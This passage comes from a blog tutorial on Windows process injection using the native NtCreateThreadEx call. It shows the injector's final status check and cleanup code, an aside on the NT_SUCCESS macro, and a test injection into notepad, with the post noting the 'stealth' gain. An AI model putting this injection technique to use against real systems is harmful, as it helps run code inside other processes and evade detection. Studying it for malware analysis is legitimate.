After this function executes, we can do a test to see if the NTSTATUS value returned by it is STATUS_SUCCESS or not. Then, we can finally finish up and begin cleanup:

(snip ...)

    if (status != STATUS_SUCCESS) {
        warn("failed to create thread, error: 0x%lx", status);
        goto CLEANUP;
    }

    okay("created thread, waiting for it to finish");
    
    WaitForSingleObject(hThread, INFINITE);
    okay("thread finished execution.");
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }

    okay("finished with the cleanup, exiting now.");
    return EXIT_SUCCESS;

}
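A quick side note on the status != STATUS_SUCCESS check: it works fine here, but it treats anything other than exactly zero as a failure. The Windows headers also provide an NT_SUCCESS macro that treats every non-negative status (success and informational values) as a success. The sketch below reproduces that macro with a stand-in NTSTATUS typedef so it compiles anywhere; call_succeeded is a hypothetical helper name, and whether the looser check is what you want depends on the function you're calling.

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t NTSTATUS; /* stand-in for the Windows typedef */

#define STATUS_SUCCESS       ((NTSTATUS)0x00000000)
#define STATUS_PENDING       ((NTSTATUS)0x00000103)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022)

/* Same definition the Windows headers use: non-negative means success. */
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

/* Hypothetical helper: returns 1 when the call should be treated as successful. */
int call_succeeded(NTSTATUS status) {
    int ok = NT_SUCCESS(status);
    /* An exact STATUS_SUCCESS must always count as success. */
    assert(status != STATUS_SUCCESS || ok);
    return ok;
}
```

The difference only shows up for values like STATUS_PENDING: call_succeeded(STATUS_PENDING) returns 1, whereas an exact comparison against STATUS_SUCCESS would have flagged it as a failure. Error values such as STATUS_ACCESS_DENIED fail both checks.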

With that, we're finally finished programming our injection program. You can find these files below or in the GitHub repository.

Performing the Injection

After compiling the program, we can test it out by injecting a humble notepad or paint process. Also, note that because this is just a glorified DLL injection, the caveats we've previously mentioned in the DLL Injection blog post are still present here, mechanics-wise. The only thing we've slightly improved here is the stealth factor. Although, again, not by much. Better than nothing, but definitely a long way from perfection as well.

Nice. Now, if we wait for the thread to finish (which will only finish after we've pressed OK), the program will begin cleanup:

There we go! You've just successfully replaced one (1) Win32 API function with its NTAPI counterpart from NTDLL. In the next blog post, we'll replace all of the Win32 API functions with their Native API counterparts. Until then, stay safe. Keep on hackin'

References

NTDLL

Native API Functions

Learning Malware Analysis (O’Reilly Online Learning)

Guide - [Theory] Native Windows API (NTAPI) (MalwareTips Forums)

Microsoft Windows library files (Wikipedia)

DLL injection via undocumented NtCreateThreadEx. Simple C++ example. (cocomelonc)

Windows Internals: System architecture, processes, threads, memory management, and more, Part 1 (Amazon.ca)
